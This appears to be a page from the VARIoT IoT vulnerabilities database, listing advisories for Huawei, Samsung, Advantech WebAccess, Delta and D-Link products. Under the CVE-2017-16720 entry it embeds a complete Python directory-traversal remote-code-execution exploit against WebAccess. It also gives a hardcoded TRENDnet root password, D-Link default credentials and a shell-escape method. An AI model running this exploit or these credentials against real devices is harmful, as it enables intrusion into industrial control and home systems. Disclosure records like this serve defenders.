VARIoT IoT vulnerabilities database
| VAR-201801-1841 | No CVE | Huawei S7700 and S9700 Denial of Service Vulnerabilities |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
The Huawei S7700 and S9700 are Huawei's intelligent routing switches. The Huawei S7700 and S9700 denial of service vulnerability is caused by the device failing to fully validate packets. An unauthenticated remote attacker can exploit the vulnerability by sending a very large message to the affected device.
| VAR-201801-1843 | No CVE | Multiple Huawei Products CRYPTO Module Buffer Overflow Vulnerability |
CVSS V2: 4.9 CVSS V3: - Severity: MEDIUM |
Huawei DP300, RP200, TE30/40/50/60, TP3106/3206, and ViewPoint9030 are Huawei's integrated desktop telepresence products and high-definition video conferencing terminals for high-end customers. A buffer overflow vulnerability exists in the CRYPTO module of several Huawei products because the program does not fully validate its input. An unauthenticated local attacker can exploit the vulnerability by constructing a file containing a parameter longer than the maximum allowed length, which can cause the system to reboot.
| VAR-201801-1839 | No CVE | Multiple Huawei Products H323 Protocol Null Pointer Reference Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Huawei AR series routers, DP300, NetEngine16EX and others are products of the Chinese company Huawei. A number of Huawei products have a null pointer dereference vulnerability in the H323 protocol because the H323 implementation does not adequately validate packets. An attacker can attack the device by sending a malformed message, which can cause the process to crash.
| VAR-201801-1823 | No CVE | Multiple Huawei Products CRYPTO Module Null Pointer Reference Vulnerability |
CVSS V2: 4.9 CVSS V3: - Severity: MEDIUM |
Huawei DP300, RP200, TE30/40/50/60, TP3106/3206, and ViewPoint9030 are Huawei's integrated desktop telepresence products and high-definition video conferencing terminals for high-end customers. A buffer overflow vulnerability exists in the CRYPTO module of several Huawei products because the program does not fully validate its input. An unauthenticated local attacker can exploit this vulnerability by constructing a file in which a parameter value is a null pointer, which can cause the system to reboot.
| VAR-201801-1818 | No CVE | H3 Protocol Resource Management Vulnerabilities in Various Huawei Products |
CVSS V2: 2.6 CVSS V3: - Severity: LOW |
Huawei AR series routers, DP300, NetEngine16EX and others are products of the Chinese company Huawei. A resource management vulnerability exists in the H323 protocol of several Huawei products because the H323 implementation does not fully validate packets. An attacker can attack the device by sending a malformed packet, which can cause the process to crash.
| VAR-201801-1815 | No CVE | A variety of Huawei products H323 protocol out of bounds read vulnerability (CNVD-2018-00343) |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Huawei AR series routers, DP300, NetEngine16EX and others are products of the Chinese company Huawei. An out-of-bounds read vulnerability exists in the H323 protocol of several Huawei products because the H323 implementation does not fully validate messages. An attacker can attack a device by sending a packet containing a special parameter, which can cause the process to crash.
| VAR-201801-1827 | No CVE | H3 Protocol Memory Leak Vulnerability for Various Huawei Products (CNVD-2018-00344) |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Huawei AR series routers, DP300, NetEngine16EX and others are products of the Chinese company Huawei. A number of Huawei products have a null pointer dereference vulnerability in the H323 protocol because the H323 implementation does not adequately validate packets. An attacker can attack a device by sending a malformed packet, which can cause a memory leak and result in a denial of service.
| VAR-201801-1828 | No CVE | Multiple Huawei Product Memory Leak Vulnerabilities (CNVD-2018-00338) |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Huawei DP300, RP200, TE30/40/50/60, and TP3106/3206 are Huawei's integrated desktop telepresence products and high-definition video conferencing terminals for high-end customers. A memory leak vulnerability exists in several Huawei products because the program does not adequately validate messages. An unauthenticated remote attacker can connect to the affected device over the SFTP/SSH protocol and send a malformed message, which can lead to a memory leak and a denial of service.
| VAR-201801-0096 | CVE-2014-8579 | TRENDnet TEW-823DRU Vulnerabilities related to the use of hard-coded credentials in device firmware |
CVSS V2: 10.0 CVSS V3: 9.8 Severity: CRITICAL |
TRENDnet TEW-823DRU devices with firmware before 1.00b36 have a hardcoded password of kcodeskcodes for the root account, which makes it easier for remote attackers to obtain access via an FTP session. TRENDnet TEW-823DRU device firmware contains a vulnerability related to the use of hard-coded credentials. Information may be obtained or altered, and service operation may be disrupted (DoS). The TRENDnet TEW-823DRU is a dual-band wireless router from Trendlink (TRENDnet). A security vulnerability exists in TRENDnet TEW-823DRU devices using firmware prior to 1.00b36, which use a hard-coded password
| VAR-201801-1361 | CVE-2018-5210 | Samsung Buffer error vulnerability in mobile device software |
CVSS V2: 9.3 CVSS V3: 8.1 Severity: HIGH |
On Samsung mobile devices with N(7.x) software and Exynos chipsets, attackers can conduct a Trustlet stack overflow attack for arbitrary TEE code execution, in conjunction with a brute-force attack to discover unlock information (PIN, password, or pattern). The Samsung ID is SVE-2017-10733. Samsung mobile device software contains a buffer error vulnerability. The vendor has confirmed this vulnerability and released it as SVE-2017-10733. Information may be obtained or altered, and service operation may be disrupted (DoS). Android L, M, and N are a set of Linux-based open source operating systems developed jointly by Google and the Open Handset Alliance (OHA). Exynos chipsets are processors designed and developed by Samsung of South Korea based on the ARM architecture. An attacker could exploit the vulnerability to execute arbitrary code and obtain PIN, password, or pattern information
| VAR-201801-0938 | CVE-2017-18020 | Samsung Mobile device software and Exynos Chipset input validation vulnerability |
CVSS V2: 7.2 CVSS V3: 8.4 Severity: HIGH |
On Samsung mobile devices with L(5.x), M(6.x), and N(7.x) software and Exynos chipsets, attackers can execute arbitrary code in the bootloader because S Boot omits a size check during a copy of ramfs data to memory. The Samsung ID is SVE-2017-10598. Samsung mobile device software and the Exynos chipset contain a vulnerability related to input validation. The vendor has confirmed this vulnerability and released it as SVE-2017-10598. Information may be obtained or altered, and service operation may be disrupted (DoS). Samsung mobile devices are smart mobile devices produced by South Korea's Samsung. Android L, M, and N are a set of Linux-based open source operating systems developed jointly by Google and the Open Handset Alliance (OHA). Exynos chipsets are processors designed and developed by Samsung of South Korea based on the ARM architecture. A security vulnerability exists in Samsung mobile devices using Android L (5.x), M (6.x) and N (7.x) and Exynos chips. The vulnerability stems from the program failing to check the size when copying ramfs data into memory. An attacker could exploit this vulnerability to execute arbitrary code in the bootloader
| VAR-201801-0138 | CVE-2017-16716 | Advantech WebAccess SQL injection vulnerability |
Related entries in the VARIoT exploits database: VAR-E-201801-0108 |
CVSS V2: 6.8 CVSS V3: 9.8 Severity: MEDIUM |
A SQL injection issue was discovered in WebAccess versions prior to 8.3. WebAccess does not properly sanitize its inputs for SQL commands. Advantech WebAccess has an SQL injection vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS). This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability. The specific flaw exists within ChkAdminViewUsrPwd1, called from mailPg.asp. The issue results from the lack of proper validation of a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code under the context of the web service. Advantech WebAccess (formerly known as BroadWin WebAccess) is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. Advantech WebAccess is prone to the following security vulnerabilities:
1. Multiple denial-of-service vulnerabilities
2. Multiple stack-based buffer-overflow vulnerabilities
3. A directory-traversal vulnerability
4. An SQL-injection vulnerability
Failed attacks will cause denial of service conditions. Versions prior to Advantech WebAccess 8.3 are vulnerable.
| VAR-201801-0152 | CVE-2017-16728 | Advantech WebAccess webvrpcs drawsrv Untrusted Pointer Dereference Remote Code Execution Vulnerability |
CVSS V2: 6.8 CVSS V3: 7.5 Severity: MEDIUM |
An untrusted pointer dereference issue was discovered in Advantech WebAccess versions prior to 8.3. There are multiple vulnerabilities that may allow an attacker to cause the program to use an invalid memory address, resulting in a program crash. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability. The specific flaw exists within the implementation of the 0x27e4 IOCTL in the webvrpcs process. An attacker can leverage this functionality to execute code under the context of Administrator. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. A denial of service vulnerability exists in versions prior to Advantech WebAccess 8.3. Advantech WebAccess is prone to the following security vulnerabilities:
1. Multiple denial-of-service vulnerabilities
2. Multiple stack-based buffer-overflow vulnerabilities
3. A directory-traversal vulnerability
4. An SQL-injection vulnerability
An attacker can exploit these issues to execute arbitrary code in the context of the application, modify data, exploit latent vulnerabilities in the underlying database, perform certain unauthorized actions, gain unauthorized access and obtain sensitive information.
| VAR-201801-0151 | CVE-2017-16724 | Advantech WebAccess bwwfaa Stack-based Buffer Overflow Remote Code Execution Vulnerability |
CVSS V2: 9.3 CVSS V3: 9.8 Severity: HIGH |
A stack-based buffer overflow issue was discovered in Advantech WebAccess versions prior to 8.3. There are multiple instances of a vulnerability that allows too much data to be written to a location on the stack. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability. The specific flaw exists within the parsing of the command line in the bwmail utility. An attacker can leverage this functionality to execute code under the context of Administrator. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. Advantech WebAccess is prone to the following security vulnerabilities:
1. Multiple denial-of-service vulnerabilities
2. Multiple stack-based buffer-overflow vulnerabilities
3. A directory-traversal vulnerability
4. An SQL-injection vulnerability
Failed attacks will cause denial of service conditions. Versions prior to Advantech WebAccess 8.3 are vulnerable.
| VAR-201801-0150 | CVE-2017-16720 | Advantech WebAccess path traversal vulnerability |
Related entries in the VARIoT exploits database: VAR-E-201803-0161 |
CVSS V2: 10.0 CVSS V3: 9.8 Severity: CRITICAL |
A path traversal issue was discovered in WebAccess versions 8.3.2 and earlier. An attacker has access to files within the directory structure of the target device. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability. The specific flaw exists within the implementation of the 0x2711 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this functionality to execute code under the context of Administrator, or to delete files accessible to the web service. Advantech WebAccess (formerly known as BroadWin WebAccess) is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. Advantech WebAccess is prone to the following security vulnerabilities:
1. Multiple denial-of-service vulnerabilities
2. Multiple stack-based buffer-overflow vulnerabilities
3. A directory-traversal vulnerability
4. An SQL-injection vulnerability
An attacker can exploit these issues to execute arbitrary code in the context of the application, modify data, exploit latent vulnerabilities in the underlying database, perform certain unauthorized actions, gain unauthorized access and obtain sensitive information. Failed attacks will cause denial of service conditions.

#!/usr/bin/python2.7
# Exploit Title: Advantech WebAccess < 8.3 webvrpcs Directory Traversal RCE Vulnerability
# Date: 03-11-2018
# Exploit Author: Chris Lyne (@lynerc)
# Vendor Homepage: www.advantech.com
# Software Link: http://advcloudfiles.advantech.com/web/Download/webaccess/8.2/AdvantechWebAccessUSANode8.2_20170817.exe
# Version: Advantech WebAccess 8.2-2017.08.18
# Tested on: Windows Server 2008 R2 Enterprise 64-bit
# CVE : CVE-2017-16720
# See Also: https://www.zerodayinitiative.com/advisories/ZDI-18-024/
import sys, struct
from impacket import uuid
from impacket.dcerpc.v5 import transport


def call(dce, opcode, stubdata):
    # Issue one DCE/RPC request and return the raw response; exit on error
    dce.call(opcode, stubdata)
    res = -1
    try:
        res = dce.recv()
    except Exception, e:
        print "Exception encountered..." + str(e)
        sys.exit(1)
    return res


if len(sys.argv) != 2:
    print "Provide only host arg"
    sys.exit(1)

port = 4592
interface = "5d2b62aa-ee0a-4a95-91ae-b064fdb471fc"
version = "1.0"
host = sys.argv[1]

# Connect to the webvrpcs DCE/RPC endpoint over TCP
string_binding = "ncacn_ip_tcp:%s" % host
trans = transport.DCERPCTransportFactory(string_binding)
trans.set_dport(port)
dce = trans.get_dce_rpc()
dce.connect()

print "Binding..."
iid = uuid.uuidtup_to_bin((interface, version))
dce.bind(iid)

print "...1"
stubdata = struct.pack("<III", 0x00, 0xc351, 0x04)
call(dce, 2, stubdata)

print "...2"
stubdata = struct.pack("<I", 0x02)
res = call(dce, 4, stubdata)
if res == -1:
    print "Something went wrong"
    sys.exit(1)
res = struct.unpack("III", res)
if (len(res) < 3):
    print "Received unexpected length value"
    sys.exit(1)

print "...3"
# ioctl 0x2711
stubdata = struct.pack("<IIII", res[2], 0x2711, 0x204, 0x204)
command = "..\\..\\windows\\system32\\calc.exe"
fmt = "<" + str(0x204) + "s"
stubdata += struct.pack(fmt, command)
call(dce, 1, stubdata)

print "\nDid it work?"
dce.disconnect()
| VAR-201803-0973 | CVE-2017-16751 | Delta Industrial Automation Screen Editor Stack Buffer Overflow Vulnerability |
CVSS V2: 6.8 CVSS V3: 7.8 Severity: HIGH |
A stack-based buffer overflow issue was discovered in Delta Electronics Delta Industrial Automation Screen Editor, version 2.00.23.00 or prior. Stack-based buffer overflow vulnerabilities caused by processing specially crafted .dpb files may allow an attacker to remotely execute arbitrary code.
1. Multiple stack-based buffer-overflow vulnerabilities
2. Multiple denial-of-service vulnerabilities
3
| VAR-201803-0129 | CVE-2017-16745 | Delta Industrial Automation Screen Editor Type Confusion Vulnerability |
CVSS V2: 6.8 CVSS V3: 7.8 Severity: HIGH |
A type confusion issue was discovered in Delta Electronics Delta Industrial Automation Screen Editor, version 2.00.23.00 or prior. An access of resource using incompatible type ('type confusion') vulnerability may allow an attacker to execute remote code when processing specially crafted .dpb files.
1. Multiple stack-based buffer-overflow vulnerabilities
2. Multiple denial-of-service vulnerabilities
3
| VAR-201803-0972 | CVE-2017-16749 | Delta Electronics Delta Industrial Automation Screen Editor Uses freed memory vulnerability |
CVSS V2: 6.8 CVSS V3: 7.8 Severity: HIGH |
A use-after-free issue was discovered in Delta Electronics Delta Industrial Automation Screen Editor, version 2.00.23.00 or prior. Specially crafted .dpb files could exploit a use-after-free vulnerability.
1. Multiple stack-based buffer-overflow vulnerabilities
2. Multiple denial-of-service vulnerabilities
3
| VAR-201803-0130 | CVE-2017-16747 | Delta Industrial Automation Screen Editor Arbitrary code execution vulnerability |
CVSS V2: 6.8 CVSS V3: 7.8 Severity: HIGH |
An out-of-bounds write issue was discovered in Delta Electronics Delta Industrial Automation Screen Editor, version 2.00.23.00 or prior. Specially crafted .dpb files may cause the system to write outside the intended buffer area. An attacker could exploit this vulnerability to execute arbitrary code (out-of-bounds writes) with a specially crafted .dpb file.
1. Multiple stack-based buffer-overflow vulnerabilities
2. Multiple denial-of-service vulnerabilities
3
| VAR-201801-1836 | No CVE | D-Link DSL-6850U Router Remote Command Execution Vulnerability |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
The D-Link DSL-6850U is a wireless router product of D-Link. The D-Link DSL-6850U router has a remote command execution vulnerability. The router has the remote web management service enabled by default; the service has the default credentials support:support and cannot be disabled. An attacker can log in to the router's web management interface with the default credentials and then manually enable the WAN-side telnet service, which is turned off by default. After logging in to the telnet service, the && or || operators can be used to escape the command sandbox and obtain full shell privileges.